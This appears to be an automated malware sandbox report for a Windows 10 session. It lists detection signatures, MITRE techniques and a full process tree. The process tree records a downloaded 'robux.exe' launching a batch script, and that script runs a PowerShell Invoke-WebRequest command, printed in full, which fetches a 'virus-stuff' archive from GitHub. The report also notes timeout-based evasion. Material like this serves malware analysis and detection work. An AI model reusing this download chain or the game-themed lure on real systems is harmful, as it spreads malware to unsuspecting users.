hxxp://google[.]com

Analysis

max time kernel
286s
max time network
231s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 10:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://google.com

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
211	556	powershell.exe
213	556	powershell.exe
218	848	powershell.exe
219	848	powershell.exe
221	1760	powershell.exe
223	1760	powershell.exe
224	1364	powershell.exe
225	1364	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

848 powershell.exe
1760 powershell.exe
1364 powershell.exe
556 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

robux.exe

pid process

4008 robux.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

207 raw.githubusercontent.com
208 raw.githubusercontent.com
Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

1732 timeout.exe
696 timeout.exe
432 timeout.exe
2036 timeout.exe
2400 timeout.exe

pid	process
848	powershell.exe
1760	powershell.exe
1364	powershell.exe
556	powershell.exe

pid	process
4008	robux.exe

flow	ioc
207	raw.githubusercontent.com
208	raw.githubusercontent.com

pid	process
1732	timeout.exe
696	timeout.exe
432	timeout.exe
2036	timeout.exe
2400	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-711569230-3659488422-571408806-1000\{CD3D15E0-E5D7-4C58-99BB-38E5714AD101}	msedge.exe

NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Unconfirmed 74026.crdownload:SmartScreen msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 74026.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exepowershell.exemsedge.exepowershell.exepowershell.exepowershell.exe

pid	process
3576	msedge.exe
3576	msedge.exe
2284	msedge.exe
2284	msedge.exe
4648	identity_helper.exe
4648	identity_helper.exe
2448	msedge.exe
2448	msedge.exe
3260	msedge.exe
3260	msedge.exe
3260	msedge.exe
3260	msedge.exe
216	msedge.exe
216	msedge.exe
556	powershell.exe
556	powershell.exe
556	powershell.exe
2616	msedge.exe
2616	msedge.exe
848	powershell.exe
848	powershell.exe
1760	powershell.exe
1760	powershell.exe
1364	powershell.exe
1364	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs

Processes:

msedge.exe

pid	process
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	848	powershell.exe
Token: SeDebugPrivilege	1760	powershell.exe
Token: SeDebugPrivilege	1364	powershell.exe

Suspicious use of FindShellTrayWindow 44 IoCs

Processes:

msedge.exe

pid	process
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 2284 wrote to memory of 928	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 928	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 4596	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 3576	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 3576	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe
PID 2284 wrote to memory of 2340	2284	msedge.exe	msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.com
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0xd8,0x7ffaf44a46f8,0x7ffaf44a4708,0x7ffaf44a4718
2⤵
PID:928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
2⤵
PID:4596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8
2⤵
PID:2340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
2⤵
PID:4148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
2⤵
PID:4080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
2⤵
PID:5020

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3852 /prefetch:8
2⤵
PID:232

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3852 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
2⤵
PID:4956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
2⤵
PID:3348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
2⤵
PID:3532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
2⤵
PID:4428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
2⤵
PID:3244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
2⤵
PID:4508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
2⤵
PID:3028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4780 /prefetch:8
2⤵
PID:4040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3932 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
2⤵
PID:4500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
2⤵
PID:4836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
2⤵
PID:3784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
2⤵
PID:4760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
2⤵
PID:1572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
2⤵
PID:4368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
2⤵
PID:2700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
2⤵
PID:4000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5444 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6264 /prefetch:8
2⤵
PID:3200

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
2⤵
PID:3760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6768 /prefetch:8
2⤵
PID:4784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
2⤵
PID:2944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
2⤵
PID:2424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
2⤵
PID:3316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1336 /prefetch:1
2⤵
PID:2664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:216

C:\Users\Admin\Downloads\robux.exe
"C:\Users\Admin\Downloads\robux.exe"
2⤵
- Executes dropped EXE
PID:4008

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6EFC.tmp\6EFD.tmp\6EFE.bat C:\Users\Admin\Downloads\robux.exe"
3⤵
PID:2944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:556

C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
4⤵
- Delays execution with timeout.exe
PID:2036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
2⤵
PID:5116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1
2⤵
PID:3136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
2⤵
PID:5068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,630689326060126381,17789086304923480167,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2616

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3328

